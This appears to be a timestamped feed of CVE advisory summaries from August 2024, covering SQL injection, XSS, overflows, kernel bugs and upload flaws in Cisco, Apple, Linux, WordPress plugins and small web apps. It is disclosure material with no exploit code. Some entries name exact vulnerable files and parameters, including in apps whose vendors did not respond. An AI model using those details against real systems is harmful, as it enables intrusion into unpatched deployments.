🚨 CVE-2024-20479A vulnerability in the web-based management interface of Cisco ISE could allow an authenticated, remote attacker to conduct an XSS attack against a user of the interface.This vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected system. An attacker could exploit this vulnerability by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit this vulnerability, the attacker must have Admin privileges on an affected device.🎖@cveNotify |
|
| 2024-08-23 15:37:38 |
🚨 CVE-2024-7267Exposure of Sensitive Information vulnerability in Naukowa i Akademicka Sie? Komputerowa - Pa?stwowy Instytut Badawczy EZD RP allows logged-in user to retrieve information about IP infrastructure and credentials. This issue affects EZD RP all versions before 19.6🎖@cveNotify |
|
| 2024-08-23 15:37:37 |
🚨 CVE-2024-7265Incorrect User Management vulnerability in Naukowa i Akademicka Sie? Komputerowa - Pa?stwowy Instytut Badawczy EZD RP allows logged-in user to change the password of any user, including root user, which could lead to privilege escalation. This issue affects EZD RP: from 15 before 15.84, from 16 before 16.15, from 17 before 17.2.🎖@cveNotify |
|
| 2024-08-23 15:37:36 |
🚨 CVE-2024-7328A vulnerability, which was classified as problematic, has been found in YouDianCMS 7. This issue affects some unknown processing of the file /t.php?action=phpinfo. The manipulation leads to information disclosure. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273251. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-23 15:37:33 |
🚨 CVE-2024-40799An out-of-bounds read issue was addressed with improved input validation. This issue is fixed in iOS 16.7.9 and iPadOS 16.7.9, macOS Ventura 13.6.8, macOS Monterey 12.7.6, iOS 17.6 and iPadOS 17.6, watchOS 10.6, tvOS 17.6, visionOS 1.3, macOS Sonoma 14.6. Processing a maliciously crafted file may lead to unexpected app termination.🎖@cveNotify |
|
| 2024-08-23 15:37:32 |
🚨 CVE-2024-40796A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sonoma 14.6, iOS 16.7.9 and iPadOS 16.7.9, macOS Monterey 12.7.6, macOS Ventura 13.6.8. Private browsing may leak some browsing history.🎖@cveNotify |
|
| 2024-08-23 15:37:31 |
🚨 CVE-2024-40794This issue was addressed through improved state management. This issue is fixed in macOS Sonoma 14.6, iOS 17.6 and iPadOS 17.6, Safari 17.6. Private Browsing tabs may be accessed without authentication.🎖@cveNotify |
|
| 2024-08-23 15:37:27 |
🚨 CVE-2024-40793This issue was addressed by removing the vulnerable code. This issue is fixed in iOS 16.7.9 and iPadOS 16.7.9, macOS Ventura 13.6.8, macOS Monterey 12.7.6, iOS 17.6 and iPadOS 17.6, watchOS 10.6, macOS Sonoma 14.6. An app may be able to access user-sensitive data.🎖@cveNotify |
|
| 2024-08-23 15:37:26 |
🚨 CVE-2024-1869Certain HP DesignJet print products are potentially vulnerable to information disclosure related to accessing memory out-of-bounds when using the general-purpose gateway (GGW) over port 9220.🎖@cveNotify |
|
| 2024-08-23 15:37:25 |
🚨 CVE-2023-28130Local user may lead to privilege escalation using Gaia Portal hostnames page.🎖@cveNotify |
|
| 2024-08-23 15:07:41 |
🚨 CVE-2024-40835A logic issue was addressed with improved checks. This issue is fixed in iOS 16.7.9 and iPadOS 16.7.9, macOS Ventura 13.6.8, macOS Monterey 12.7.6, iOS 17.6 and iPadOS 17.6, watchOS 10.6, macOS Sonoma 14.6. A shortcut may be able to use sensitive data with certain actions without prompting the user.🎖@cveNotify |
|
| 2024-08-23 15:07:40 |
🚨 CVE-2024-40834This issue was addressed by adding an additional prompt for user consent. This issue is fixed in macOS Sonoma 14.6, macOS Monterey 12.7.6, macOS Ventura 13.6.8. A shortcut may be able to bypass sensitive Shortcuts app settings.🎖@cveNotify |
|
| 2024-08-23 15:07:36 |
🚨 CVE-2024-40832The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.6. An app may be able to view a contact's phone number in system logs.🎖@cveNotify |
|
| 2024-08-23 15:07:35 |
🚨 CVE-2024-40803A type confusion issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.6, macOS Monterey 12.7.6, macOS Ventura 13.6.8. An attacker may be able to cause unexpected app termination.🎖@cveNotify |
|
| 2024-08-23 15:07:30 |
🚨 CVE-2024-5307Kofax Power PDF AcroForm Annotation Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Kofax Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of Annotation objects in AcroForms. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-22933.🎖@cveNotify |
|
| 2024-08-23 15:07:29 |
🚨 CVE-2024-5305Kofax Power PDF PDF File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Kofax Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22921.🎖@cveNotify |
|
| 2024-08-23 15:07:28 |
🚨 CVE-2024-5304Kofax Power PDF TGA File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Kofax Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of TGA files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22920.🎖@cveNotify |
|
| 2024-08-23 14:37:45 |
🚨 CVE-2024-42123In the Linux kernel, the following vulnerability has been resolved:drm/amdgpu: fix double free err_addr pointer warningsIn amdgpu_umc_bad_page_polling_timeout, the amdgpu_umc_handle_bad_pageswill be run many times so that double free err_addr in some special case.So set the err_addr to NULL to avoid the warnings.🎖@cveNotify |
|
| 2024-08-23 14:37:44 |
🚨 CVE-2024-7221A vulnerability, which was classified as critical, has been found in SourceCodester School Log Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/manage_user.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272792.🎖@cveNotify |
|
| 2024-08-23 14:37:43 |
🚨 CVE-2024-7220A vulnerability classified as critical was found in SourceCodester School Log Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/print_barcode.php. The manipulation of the argument tbl leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272791.🎖@cveNotify |
|
| 2024-08-23 14:37:42 |
🚨 CVE-2024-7219A vulnerability classified as critical has been found in SourceCodester School Log Management System 1.0. Affected is an unknown function of the file /admin/ajax.php?action=login. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-272790 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-23 14:37:38 |
🚨 CVE-2024-7191A vulnerability, which was classified as critical, has been found in itsourcecode Society Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/get_balance.php. The manipulation of the argument student_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272612.🎖@cveNotify |
|
| 2024-08-23 14:37:37 |
🚨 CVE-2024-7190A vulnerability classified as critical was found in itsourcecode Society Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/get_price.php. The manipulation of the argument expenses_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272611.🎖@cveNotify |
|
| 2024-08-23 14:07:38 |
🚨 CVE-2024-41804Xibo is a content management system (CMS). An SQL injection vulnerability was discovered in the API route inside the CMS responsible for Adding/Editing DataSet Column Formulas. This allows an authenticated user to to obtain and modify arbitrary data from the Xibo database by injecting specially crafted values in to the `formula` parameter. Users should upgrade to version 3.3.12 or 4.0.14 which fix this issue.🎖@cveNotify |
|
| 2024-08-23 14:07:37 |
🚨 CVE-2024-41802Xibo is a content management system (CMS). An SQL injection vulnerability was discovered in the API routes inside the CMS responsible for Filtering DataSets. This allows an authenticated user to to obtain and modify arbitrary data from the Xibo database by injecting specially crafted values in to the APIs for importing JSON and importing a Layout containing DataSet data.Users should upgrade to version 3.3.12 or 4.0.14 which fix this issue🎖@cveNotify |
|
| 2024-08-23 14:07:33 |
🚨 CVE-2024-23091Weak password hashing using MD5 in funzioni.php in HotelDruid before 1.32 allows an attacker to obtain plaintext passwords from hash values.🎖@cveNotify |
|
| 2024-08-23 14:07:32 |
🚨 CVE-2024-7127Improper Neutralization of Input During Web Page Generation vulnerability in Stackposts Social Marketing Tool allows Cross-site Scripting (XSS) attack. By submitting the payload in the username during registration, it can be executed later in the application panel. This could lead to the unauthorised acquisition of information (e.g. cookies from a logged-in user). After multiple attempts to contact the vendor we did not receive any answer. Our team has confirmed the existence of this vulnerability. We suppose this issue affects Social Marketing Tool in all versions.🎖@cveNotify |
|
| 2024-08-23 14:07:31 |
🚨 CVE-2024-7224A vulnerability was found in SourceCodester Lot Reservation Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /lot_details.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272804.🎖@cveNotify |
|
| 2024-08-23 14:07:30 |
🚨 CVE-2024-7223A vulnerability has been found in SourceCodester Lot Reservation Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /view_model.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272803.🎖@cveNotify |
|
| 2024-08-23 14:07:27 |
🚨 CVE-2024-7222A vulnerability, which was classified as critical, was found in SourceCodester Lot Reservation Management System 1.0. Affected is an unknown function of the file /home.php. The manipulation of the argument type leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-272802 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-23 14:07:26 |
🚨 CVE-2024-6916A vulnerability in Zowe CLI allows local, privileged actors to display securely stored properties in cleartext within a terminal using the '--show-inputs-only' flag.🎖@cveNotify |
|
| 2024-08-23 14:07:25 |
🚨 CVE-2022-0185A heap-based buffer overflow flaw was found in the way the legacy_parse_param function in the Filesystem Context functionality of the Linux kernel verified the supplied parameters length. An unprivileged (in case of unprivileged user namespaces enabled, otherwise needs namespaced CAP_SYS_ADMIN privilege) local user able to open a filesystem that does not support the Filesystem Context API (and thus fallbacks to legacy handling) could use this flaw to escalate their privileges on the system.🎖@cveNotify |
|
| 2024-08-23 13:37:24 |
🚨 CVE-2024-43883In the Linux kernel, the following vulnerability has been resolved:usb: vhci-hcd: Do not drop references before new references are gainedAt a few places the driver carries stale pointersto references that can still be used. Make sure that does not happen.This strictly speaking closes ZDI-CAN-22273, though there may besimilar races in the driver.🎖@cveNotify |
|
| 2024-08-23 12:37:24 |
🚨 CVE-2024-7986A vulnerability exists in the Rockwell Automation ThinManager® ThinServer that allows a threat actor to disclose sensitive information. A threat actor can exploit this vulnerability by abusing the ThinServer™ service to read arbitrary files by creating a junction that points to the target directory.🎖@cveNotify |
|
| 2024-08-23 09:37:25 |
🚨 CVE-2024-38807Applications that use spring-boot-loader or spring-boot-loader-classic and contain custom code that performs signature verification of nested jar files may be vulnerable to signature forgery where content that appears to have been signed by one signer has, in fact, been signed by another.🎖@cveNotify |
|
| 2024-08-23 08:37:25 |
🚨 CVE-2024-24303SQL Injection vulnerability in HiPresta "Gift Wrapping Pro" (hiadvancedgiftwrapping) module for PrestaShop before version 1.4.1, allows remote attackers to escalate privileges and obtain sensitive information via the HiAdvancedGiftWrappingGiftWrappingModuleFrontController::addGiftWrappingCartValue() method.🎖@cveNotify |
|
| 2024-08-23 07:37:24 |
🚨 CVE-2024-40766An improper access control vulnerability has been identified in the SonicWall SonicOS management access, potentially leading to unauthorized resource access and in specific conditions, causing the firewall to crash. This issue affects SonicWall Firewall Gen 5 and Gen 6 devices, as well as Gen 7 devices running SonicOS 7.0.1-5035 and older versions.🎖@cveNotify |
|
| 2024-08-23 06:37:25 |
🚨 CVE-2024-6715The Ditty WordPress plugin before 3.1.46 re-introduced a previously fixed security issue (https://wpscan.com/vulnerability/80a9eb3a-2cb1-4844-9004-ba2554b2d46c/) in v3.1.39🎖@cveNotify |
|
| 2024-08-23 06:37:24 |
🚨 CVE-2024-3282The WP Table Builder WordPress plugin through 1.5.0 does not sanitise and escape some of its Table data, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-08-23 05:37:24 |
🚨 CVE-2024-7258The WooCommerce Google Feed Manager plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'wppfm_removeFeedFile' function in all versions up to, and including, 2.8.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).🎖@cveNotify |
|
| 2024-08-23 03:37:24 |
🚨 CVE-2024-7559The File Manager Pro plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation and capability checks in the mk_file_folder_manager AJAX action in all versions up to, and including, 8.3.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2024-08-23 03:07:33 |
🚨 CVE-2024-7178A vulnerability was found in TOTOLINK A3600R 4.1.2cu.5182_B20201102. It has been declared as critical. Affected by this vulnerability is the function setMacQos of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument priority/macAddress leads to buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272599. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-23 03:07:32 |
🚨 CVE-2024-38506In JetBrains YouTrack before 2024.2.34646 user without appropriate permissions could enable the auto-attach option for workflows🎖@cveNotify |
|
| 2024-08-23 03:07:29 |
🚨 CVE-2024-38505In JetBrains YouTrack before 2024.2.34646 user access token was sent to the third-party site🎖@cveNotify |
|
| 2024-08-23 03:07:28 |
🚨 CVE-2024-23111An improper neutralization of input during web page Generation ('Cross-site Scripting') vulnerability [CWE-79] in FortiOS version 7.4.3 and below, 7.2 all versions, 7.0 all versions and FortiProxy version 7.4.2 and below, 7.2 all versions, 7.0 all versions reboot page may allow a remote privileged attacker with super-admin access to execute JavaScript code via crafted HTTP GET requests.🎖@cveNotify |
|
| 2024-08-23 03:07:27 |
🚨 CVE-2023-46720A stack-based buffer overflow in Fortinet FortiOS version 7.4.0 through 7.4.1 and 7.2.0 through 7.2.7 and 7.0.0 through 7.0.12 and 6.4.6 through 6.4.15 and 6.2.9 through 6.2.16 and 6.0.13 through 6.0.18 allows attacker to execute unauthorized code or commands via specially crafted CLI commands.🎖@cveNotify |
|
| 2024-08-23 02:37:33 |
🚨 CVE-2024-6115A vulnerability classified as critical was found in itsourcecode Simple Online Hotel Reservation System 1.0. Affected by this vulnerability is an unknown functionality of the file add_room.php. The manipulation of the argument photo leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268867.🎖@cveNotify |
|
| 2024-08-23 02:37:26 |
🚨 CVE-2024-6112A vulnerability classified as critical was found in itsourcecode Pool of Bethesda Online Reservation System 1.0. This vulnerability affects unknown code of the file index.php. The manipulation of the argument log_email leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-268858 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-23 02:37:25 |
🚨 CVE-2024-31398Insertion of sensitive information into sent data issue exists in Cybozu Garoon 5.0.0 to 5.15.2. If this vulnerability is exploited, a user who can log in to the product may obtain information on the list of users.🎖@cveNotify |
|
| 2024-08-23 02:07:38 |
🚨 CVE-2022-48930In the Linux kernel, the following vulnerability has been resolved:RDMA/ib_srp: Fix a deadlockRemove the flush_workqueue(system_long_wq) call since flushingsystem_long_wq is deadlock-prone and since that call is redundant with apreceding cancel_work_sync()🎖@cveNotify |
|
| 2024-08-23 02:07:35 |
🚨 CVE-2022-48929In the Linux kernel, the following vulnerability has been resolved:bpf: Fix crash due to out of bounds access into reg2btf_ids.When commit e6ac2450d6de ("bpf: Support bpf program calling kernel function") addedkfunc support, it defined reg2btf_ids as a cheap way to translate the verifierreg type to the appropriate btf_vmlinux BTF ID, howevercommit c25b2ae13603 ("bpf: Replace PTR_TO_XXX_OR_NULL with PTR_TO_XXX | PTR_MAYBE_NULL")moved the __BPF_REG_TYPE_MAX from the last member of bpf_reg_type enum to afterthe base register types, and defined other variants using type flagcomposition. However, now, the direct usage of reg->type to index intoreg2btf_ids may no longer fall into __BPF_REG_TYPE_MAX range, and hence lead toout of bounds access and kernel crash on dereference of bad pointer.🎖@cveNotify |
|
| 2024-08-23 02:07:34 |
🚨 CVE-2022-48926In the Linux kernel, the following vulnerability has been resolved:usb: gadget: rndis: add spinlock for rndis response listThere's no lock for rndis response list. It could cause list corruptionif there're two different list_add at the same time like below.It's better to add in rndis_add_response / rndis_free_response/ rndis_get_next_response to prevent any race condition on response list.[ 361.894299] [1: irq/191-dwc3:16979] list_add corruption.next->prev should be prev (ffffff80651764d0),but was ffffff883dc36f80. (next=ffffff80651764d0).[ 361.904380] [1: irq/191-dwc3:16979] Call trace:[ 361.904391] [1: irq/191-dwc3:16979] __list_add_valid+0x74/0x90[ 361.904401] [1: irq/191-dwc3:16979] rndis_msg_parser+0x168/0x8c0[ 361.904409] [1: irq/191-dwc3:16979] rndis_command_complete+0x24/0x84[ 361.904417] [1: irq/191-dwc3:16979] usb_gadget_giveback_request+0x20/0xe4[ 361.904426] [1: irq/191-dwc3:16979] dwc3_gadget_giveback+0x44/0x60[ 361.904434] [1: irq/191-dwc3:16979] dwc3_ep0_complete_data+0x1e8/0x3a0[ 361.904442] [1: irq/191-dwc3:16979] dwc3_ep0_interrupt+0x29c/0x3dc[ 361.904450] [1: irq/191-dwc3:16979] dwc3_process_event_entry+0x78/0x6cc[ 361.904457] [1: irq/191-dwc3:16979] dwc3_process_event_buf+0xa0/0x1ec[ 361.904465] [1: irq/191-dwc3:16979] dwc3_thread_interrupt+0x34/0x5c🎖@cveNotify |
|
| 2024-08-23 02:07:33 |
🚨 CVE-2024-41439A heap buffer overflow in the function cp_block() (/vendor/cute_png.h) of hicolor v0.5.0 allows attackers to cause a Denial of Service (DoS) via a crafted PNG file.🎖@cveNotify |
|
| 2024-08-23 00:37:34 |
🚨 CVE-2024-8089A vulnerability was found in SourceCodester E-Commerce System 1.0. It has been classified as critical. Affected is an unknown function of the file /ecommerce/admin/products/controller.php. The manipulation of the argument photo leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-22 23:37:25 |
🚨 CVE-2024-38209Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-08-22 23:37:24 |
🚨 CVE-2024-38208Microsoft Edge for Android Spoofing Vulnerability🎖@cveNotify |
|
| 2024-08-22 22:37:25 |
🚨 CVE-2024-8081A vulnerability classified as critical was found in itsourcecode Payroll Management System 1.0. Affected by this vulnerability is an unknown functionality of the file login.php. The manipulation of the argument username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-22 22:37:24 |
🚨 CVE-2024-43790Vim is an open source command line text editor. When performing a search and displaying the search-count message is disabled (:set shm+=S), the search pattern is displayed at the bottom of the screen in a buffer (msgbuf). When right-left mode (:set rl) is enabled, the search pattern is reversed. This happens by allocating a new buffer. If the search pattern contains some ASCII NUL characters, the buffer allocated will be smaller than the original allocated buffer (because for allocating the reversed buffer, the strlen() function is called, which only counts until it notices an ASCII NUL byte ) and thus the original length indicator is wrong. This causes an overflow when accessing characters inside the msgbuf by the previously (now wrong) length of the msgbuf. The issue has been fixed as of Vim patch v9.1.0689.🎖@cveNotify |
|
| 2024-08-22 21:37:41 |
🚨 CVE-2024-8079A vulnerability was found in TOTOLINK AC1200 T8 4.1.5cu.862_B20230228. It has been rated as critical. This issue affects the function exportOvpn. The manipulation leads to buffer overflow. The attack may be initiated remotely. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-22 21:37:40 |
🚨 CVE-2024-8078A vulnerability was found in TOTOLINK AC1200 T8 4.1.5cu.862_B20230228. It has been declared as critical. This vulnerability affects the function setTracerouteCfg. The manipulation leads to buffer overflow. The attack can be initiated remotely. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-22 21:37:37 |
🚨 CVE-2024-42763A Reflected Cross Site Scripting (XSS) vulnerability was found in the "/schedule.php" page of the Kashipara Bus Ticket Reservation System v1.0, which allows remote attackers to execute arbitrary code via the "bookingdate" parameter.🎖@cveNotify |
|
| 2024-08-22 21:37:36 |
🚨 CVE-2023-7260Path Traversal vulnerability discovered in OpenText™ CX-E Voice, affecting all version through 22.4. The vulnerability could allow arbitrarily access files on the system.🎖@cveNotify |
|
| 2024-08-22 21:37:35 |
🚨 CVE-2024-45191An issue was discovered in Matrix libolm (aka Olm) through 3.2.16. The AES implementation is vulnerable to cache-timing attacks due to use of S-boxes. This is related to software that uses a lookup table for the SubWord step. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-08-22 21:37:32 |
🚨 CVE-2024-41572Learning with Texts (LWT) 2.0.3 is vulnerable to Cross Site Scripting (XSS). The application has a specific function that does not filter special characters in URL parameters. Remote attackers can inject JavaScript code without authorization. Exploiting this vulnerability, attackers can steal user credentials or execute actions such as injecting malicious scripts or redirecting users to malicious sites.🎖@cveNotify |
|
| 2024-08-22 21:37:31 |
🚨 CVE-2024-41704LibreChat through 0.7.4-rc1 does not validate the normalized pathnames of images.🎖@cveNotify |
|
| 2024-08-22 21:37:30 |
🚨 CVE-2024-35512An issue in hmq v1.5.5 allows attackers to cause a Denial of Service (DoS) via crafted requests.🎖@cveNotify |
|
| 2024-08-22 21:37:26 |
🚨 CVE-2024-28390An issue in Advanced Plugins ultimateimagetool module for PrestaShop before v.2.2.01, allows a remote attacker to escalate privileges and obtain sensitive information via Improper Access Control.🎖@cveNotify |
|
| 2024-08-22 21:37:25 |
🚨 CVE-2023-51931An issue in alanclarke URLite v.3.1.0 allows an attacker to cause a denial of service (DoS) via a crafted payload to the parsing function.🎖@cveNotify |
|
| 2024-08-22 20:37:44 |
🚨 CVE-2024-25738A Server-Side Request Forgery (SSRF) vulnerability in the /Upgrade/FixConfig route in Open Library Foundation VuFind 2.0 through 9.1 before 9.1.1 allows a remote attacker to overwrite local configuration files to gain access to the administrator panel and achieve Remote Code Execution. A mitigating factor is that it requires the allow_url_include PHP runtime setting to be on, which is off in default installations. It also requires the /Upgrade route to be exposed, which is exposed by default after installing VuFind, and is recommended to be disabled by setting autoConfigure to false in config.ini.🎖@cveNotify |
|
| 2024-08-22 20:37:38 |
🚨 CVE-2024-25657An open redirect in the Login/Logout functionality of web management in AVSystem Unified Management Platform (UMP) 23.07.0.16567~LTS could allow attackers to redirect authenticated users to malicious websites.🎖@cveNotify |
|
| 2024-08-22 20:37:37 |
🚨 CVE-2024-28213nGrinder before 3.5.9 allows to accept serialized Java objects from unauthenticated users, which could allow remote attacker to execute arbitrary code via unsafe Java objects deserialization.🎖@cveNotify |
|
| 2024-08-22 20:37:36 |
🚨 CVE-2021-46950In the Linux kernel, the following vulnerability has been resolved:md/raid1: properly indicate failure when ending a failed write requestThis patch addresses a data corruption bug in raid1 arrays using bitmaps.Without this fix, the bitmap bits for the failed I/O end up being cleared.Since we are in the failure leg of raid1_end_write_request, the requesteither needs to be retried (R1BIO_WriteError) or failed (R1BIO_Degraded).🎖@cveNotify |
|
| 2024-08-22 20:37:32 |
🚨 CVE-2021-3600It was discovered that the eBPF implementation in the Linux kernel did not properly track bounds information for 32 bit registers when performing div and mod operations. A local attacker could use this to possibly execute arbitrary code.🎖@cveNotify |
|
| 2024-08-22 20:37:31 |
🚨 CVE-2023-32258A flaw was found in the Linux kernel's ksmbd, a high-performance in-kernel SMB server. The specific flaw exists within the processing of SMB2_LOGOFF and SMB2_CLOSE commands. The issue results from the lack of proper locking when performing operations on an object. An attacker can leverage this vulnerability to execute code in the context of the kernel.🎖@cveNotify |
|
| 2024-08-22 20:37:26 |
🚨 CVE-2023-3776A use-after-free vulnerability in the Linux kernel's net/sched: cls_fw component can be exploited to achieve local privilege escalation.If tcf_change_indev() fails, fw_set_parms() will immediately return an error after incrementing or decrementing the reference counter in tcf_bind_filter(). If an attacker can control the reference counter and set it to zero, they can cause the reference to be freed, leading to a use-after-free vulnerability.We recommend upgrading past commit 0323bce598eea038714f941ce2b22541c46d488f.🎖@cveNotify |
|
| 2024-08-22 20:37:25 |
🚨 CVE-2022-48425In the Linux kernel through 6.2.7, fs/ntfs3/inode.c has an invalid kfree because it does not validate MFT flags before replaying logs.🎖@cveNotify |
|
| 2024-08-22 19:37:25 |
🚨 CVE-2024-22394An improper authentication vulnerability has been identified in SonicWall SonicOS SSL-VPN feature, which in specific conditions could allow a remote attacker to bypass authentication. This issue affects only firmware version SonicOS 7.1.1-7040.🎖@cveNotify |
|
| 2024-08-22 19:37:24 |
🚨 CVE-2024-24133Atmail v6.6.0 was discovered to contain a SQL injection vulnerability via the username parameter on the login page.🎖@cveNotify |
|
| 2024-08-22 19:07:26 |
🚨 CVE-2022-48938In the Linux kernel, the following vulnerability has been resolved:CDC-NCM: avoid overflow in sanity checkingA broken device may give an extreme offset like 0xFFF0and a reasonable length for a fragment. In the sanitycheck as formulated now, this will create an integeroverflow, defeating the sanity check. Both offsetand offset + len need to be checked in such a mannerthat no overflow can occur.And those quantities should be unsigned.🎖@cveNotify |
|
| 2024-08-22 19:07:25 |
🚨 CVE-2022-48936In the Linux kernel, the following vulnerability has been resolved:gso: do not skip outer ip header in case of ipip and net_failoverWe encounter a tcp drop issue in our cloud environment. Packet GROed inhost forwards to a VM virtio_net nic with net_failover enabled. VM actsas a IPVS LB with ipip encapsulation. The full path like:host gro -> vm virtio_net rx -> net_failover rx -> ipvs fullnat -> ipip encap -> net_failover tx -> virtio_net txWhen net_failover transmits a ipip pkt (gso_type = 0x0103, which meansSKB_GSO_TCPV4, SKB_GSO_DODGY and SKB_GSO_IPXIP4), there is no gsodid because it supports TSO and GSO_IPXIP4. But network_header points toinner ip header.Call Trace: tcp4_gso_segment ------> return NULL inet_gso_segment ------> inner iph, network_header points to ipip_gso_segment inet_gso_segment ------> outer iph skb_mac_gso_segmentAfterwards virtio_net transmits the pkt, only inner ip header is modified.And the outer one just keeps unchanged. The pkt will be dropped in remotehost.Call Trace: inet_gso_segment ------> inner iph, outer iph is skipped skb_mac_gso_segment __skb_gso_segment validate_xmit_skb validate_xmit_skb_list sch_direct_xmit __qdisc_run __dev_queue_xmit ------> virtio_net dev_hard_start_xmit __dev_queue_xmit ------> net_failover ip_finish_output2 ip_output iptunnel_xmit ip_tunnel_xmit ipip_tunnel_xmit ------> ipip dev_hard_start_xmit __dev_queue_xmit ip_finish_output2 ip_output ip_forward ip_rcv __netif_receive_skb_one_core netif_receive_skb_internal napi_gro_receive receive_buf virtnet_poll net_rx_actionThe root cause of this issue is specific with the rare combination ofSKB_GSO_DODGY and a tunnel device that adds an SKB_GSO_ tunnel option.SKB_GSO_DODGY is set from external virtio_net. We need to reset networkheader when callbacks.gso_segment() returns NULL.This patch also includes ipv6_gso_segment(), considering SIT, etc.🎖@cveNotify |
|
| 2024-08-22 19:07:24 |
🚨 CVE-2024-40347A reflected cross-site scripting (XSS) vulnerability in Hyland Alfresco Platform 23.2.1-r96 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload into the parameter htmlid.🎖@cveNotify |
|
| 2024-08-22 18:37:43 |
🚨 CVE-2024-42767Kashipara Hotel Management System v1.0 is vulnerable to Unrestricted File Upload RCE via /admin/add_room_controller.php.🎖@cveNotify |
|
| 2024-08-22 18:37:42 |
🚨 CVE-2024-36439Swissphone DiCal-RED 4009 devices allow a remote attacker to gain access to the administrative web interface via the device password's hash value, without knowing the actual device password.🎖@cveNotify |
|
| 2024-08-22 18:37:41 |
